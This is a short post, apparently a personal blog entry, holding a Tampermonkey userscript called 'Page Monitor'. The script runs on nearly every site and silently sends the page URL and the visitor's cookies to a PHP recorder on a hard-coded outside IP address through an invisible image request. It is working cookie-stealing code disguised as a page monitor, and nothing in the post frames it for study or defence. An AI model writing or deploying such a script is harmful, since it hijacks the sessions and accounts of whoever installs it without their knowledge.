monitor

时间:2022-05-28 23:02:56
// ==UserScript==
// @name Page Monitor
// @namespace http://tampermonkey.net/
// @version 0.1
// @description try to take over the world!
// @author Dem0nX14n3
// @match *
// @include *
// @exclude https://*.baidu.com/*
// @exclude http://*.baidu.com/*
// @exclude http://118.89.51.198/*
// @grant none
// ==/UserScript== (function() {
'use strict';
var img = new Image();
var storageURL = "http://118.89.51.198/lzx/recorder.php"; //information storage file
var accessURL = window.location;
var acCookie = document.cookie;
img.style.width = img.style.height = "0";
img.src = storageURL +"URL="+accessURL +"&Cookie="+acCookie;
// Your code here...
})();